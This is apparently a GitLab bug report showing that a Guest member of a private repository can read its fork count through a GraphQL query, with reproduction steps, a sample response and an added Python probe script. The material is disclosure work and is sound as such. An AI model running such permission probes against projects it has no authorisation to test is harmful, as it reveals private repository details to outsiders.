Number of forks of a private repository is exposed via GraphQL to a Guest member.
Greetings Team,

Summary

A Guest member of any private repository can query the number of forks the repository has via GraphQL. At first glance this doesn't pose a security threat as such, but I couldn't find this permission mentioned in the docs.

Steps to reproduce
- Create a private repository and invite two more users (three accounts in total is the minimum needed to show the bug).
- Give one of the invited users Guest access and the other Developer access.
- Using the Developer account, fork the repository.
- Using the Guest account, run the following GraphQL query:
```graphql
# Only forksCount is requested; the query name is incidental.
query pathLastCommit($projectPath: ID!) {
  project(fullPath: $projectPath) {
    forksCount
  }
}
```
Variables (only `projectPath` is used by this query):
```json
{
  "projectPath": "private_repository_name",
  "path": "",
  "ref": "master"
}
```
Response:
```json
{"data":{"project":{"forksCount":1}}}
```
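The probe below is an added example, not part of the original report, that automates the final step: it sends the same `forksCount` query as a given account and reports whether the field came back. It assumes the public endpoint `https://gitlab.com/api/graphql`, a personal access token for the Guest account supplied in the `GITLAB_TOKEN` environment variable, and that GitLab's GraphQL API answers `"project": null` (rather than an error) when the caller has no access to the project. The HTTP transport is injectable so the parsing logic can be exercised offline against constructed responses such as the one shown above.

```python
"""Probe whether an account can read a private project's forksCount over GitLab GraphQL.

Added example, not the reporter's or GitLab's own code. Assumed: the public
GraphQL endpoint, a Guest personal access token in GITLAB_TOKEN, and that an
inaccessible project is returned as "project": null.
"""
import json
import os
import sys
import urllib.request
from typing import Callable, Optional

GITLAB_GRAPHQL = "https://gitlab.com/api/graphql"  # assumed endpoint

# Same field as the report's query; the unused path/ref variables are dropped.
FORKS_QUERY = """
query projectForksCount($projectPath: ID!) {
  project(fullPath: $projectPath) {
    forksCount
  }
}
"""


def build_request(project_path: str) -> dict:
    """Body for the GraphQL POST, exactly as the Guest account would send it."""
    return {"query": FORKS_QUERY, "variables": {"projectPath": project_path}}


def forks_count_from_response(body: dict) -> Optional[int]:
    """Return forksCount if the server served it, None if the project was hidden.

    Assumption: GitLab GraphQL returns "project": null (or a top-level error
    with no data) when the caller cannot see the project, so None here means
    the field was NOT exposed to this account.
    """
    project = (body.get("data") or {}).get("project")
    if not project:
        return None
    return project.get("forksCount")


def http_transport(token: str, endpoint: str = GITLAB_GRAPHQL) -> Callable[[dict], dict]:
    """Real transport: POST the JSON body with a bearer token and decode the reply."""
    def post(payload: dict) -> dict:
        req = urllib.request.Request(
            endpoint,
            data=json.dumps(payload).encode(),
            headers={
                "Content-Type": "application/json",
                "Authorization": f"Bearer {token}",
            },
        )
        with urllib.request.urlopen(req, timeout=30) as resp:
            return json.load(resp)
    return post


def probe(project_path: str, post: Callable[[dict], dict]) -> dict:
    """Run the query through `post` and report whether forksCount was exposed.

    A count of 0 still counts as exposed: the Guest learned the fork count.
    """
    count = forks_count_from_response(post(build_request(project_path)))
    return {"project": project_path, "forks_count": count, "exposed": count is not None}


if __name__ == "__main__":
    token = os.environ.get("GITLAB_TOKEN")
    if not token or len(sys.argv) != 2:
        sys.exit("usage: GITLAB_TOKEN=<guest token> python probe_forks.py <group/project>")
    print(json.dumps(probe(sys.argv[1], http_transport(token)), indent=2))
```

Run it once with the Guest token and once with a token for an account that is not a member at all; the Guest run returning `"exposed": true` while the non-member run returns `false` isolates the leak to the Guest role rather than to the project being reachable in general.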
What is the current bug behavior?
The Guest user can see how many forks the repository has, which is not part of the documented Guest permissions and could be used as an input to side-channel attacks.
What is the expected correct behavior?
Since it isn't listed in the privileges for the Guest role, reading `forksCount` shouldn't be allowed.

Output of checks
This bug happens on GitLab.com.
Impact
The Guest user can see how many forks the repository has, which could be used as an input to side-channel attacks. Knowing that forks exist tells the Guest user that separate copies of the code exist beyond the one in the private repository, something the Guest role is not meant to reveal.
PS: I reported this on the HackerOne platform and, as was rightly pointed out there, it is a bug that is better suited here, hence the format.
Possible fix
The Guest role's permission to read the `forksCount` property should be removed. Even if the severity is very slight, I am sure this isn't intended behavior.